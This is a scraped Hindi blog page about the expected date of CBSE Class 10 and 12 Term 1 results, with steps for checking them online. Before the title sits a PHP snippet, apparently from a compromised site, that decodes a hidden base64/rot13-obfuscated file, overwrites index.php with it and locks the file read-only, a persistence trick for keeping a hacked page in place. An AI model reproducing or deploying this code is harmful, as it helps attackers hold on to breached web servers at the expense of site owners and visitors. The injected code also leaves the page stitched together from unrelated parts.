$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } जाने CBSE Class 10th, 12th 1 Term रिजल्ट आने का डेट और टाइम क्या है ? – E-Sharm

जाने CBSE Class 10th, 12th 1 Term रिजल्ट आने का डेट और टाइम क्या है ?

Sharing Is Caring:

बच्चो आप जान ही रहे है की आप सभी का फर्स्ट टर्म्स का पेपर हो चूका है और आप सभी ने अपना best दिया होगा अपने अपने पेपर में पर बच्चो जब तक स्टूडेंट का रिजल्ट नहीं निकलता है तब तक हमें अंदर से ये डर लगा होता है की पता नहीं मेरा कितना नंबर आयेगा कितना नंबर नहीं आयेगा और ये सभी स्टूडेंट की प्रॉब्लम होती है तो आज हम आपको बताने वाले की आपका फर्स्ट टर्म्स बोर्ड के जो पेपर हुए थे उसका रिजल्ट कब तक आएगा बच्चो पर आपको बता दिया जाये की अभी तक कोई CBSE की तरह से कोई ऑफिसियल जानकारी नहीं मिले है पर ये जानकारी भी आपके लिए सही है पर एक बार फिर से बता दूँ की ये जानकरी ऑफिसियल नहीं है ये जानकारी अभी तक जो जानकरी हमें मिले है उसके आधार पर दिया जा रहा है |

केंद्रीय माध्यमिक शिक्षा बोर्ड, सीबीएसई कक्षा 10, 12 परिणाम 2021-22 टर्म 1 जल्द ही इस सप्ताह के भीतर घोषित किया जाएगा। सूत्रों के मुताबिक स्कूल के शिक्षकों ने पेपर चेक कर लिए हैं और इसी हफ्ते तक रिजल्ट आ रहा है. हालांकि, सीबीएसई ने अभी तक इस पर कोई आधिकारिक घोषणा नहीं की है। बोर्ड आधिकारिक पर सीबीएसई टर्म 1 परिणाम जारी करेगा official website–cbseresults.nic.in.

आधिकारिक वेबसाइट और बोर्ड के आधिकारिक ट्विटर हैंडल पर भी सूचना की घोषणा होने की उम्मीद है। इस समय, दोनों कक्षाओं के लिए मूल्यांकन प्रक्रिया चल रही है और बोर्ड इस सप्ताह तक इसकी समीक्षा करेगा।

सीबीएसई कक्षा 10, 12 बोर्ड परीक्षा 2022 फर्स्ट टर्म रिजल्ट: रिजल्ट कैसे देखे

  • सीबीएसई की ऑफिशियल वेबसाइट cbse.nic.in पर जाएं
  • लिंक पर क्लिक करें – ‘सीबीएसई 10वीं टर्म 1 रिजल्ट 2022’ या ‘सीबीएसई 12वीं रिजल्ट 2022’
    अपना रोल नंबर और जन्म तिथि दर्ज करें और विवरण जमा करें
    सबमिट करने के बाद, आपके कक्षा 10 और 12 के परिणाम स्क्रीन पर दिखाई देंगे
    भविष्य में उपयोग के लिए अपना सीबीएसई कक्षा 10 स्कोरकार्ड और सीबीएसई कक्षा 12 स्कोरकार्ड सहेजें।
    साथ ही डिजिलॉकर ऐप और वेबसाइट digilocker.gov.in पर भी रिजल्ट देखा जा सकता है। संभावना है कि परिणाम उमंग ऐप और एसएमएस के जरिए भी उपलब्ध होगा।

Leave a Comment

error: Content is protected !!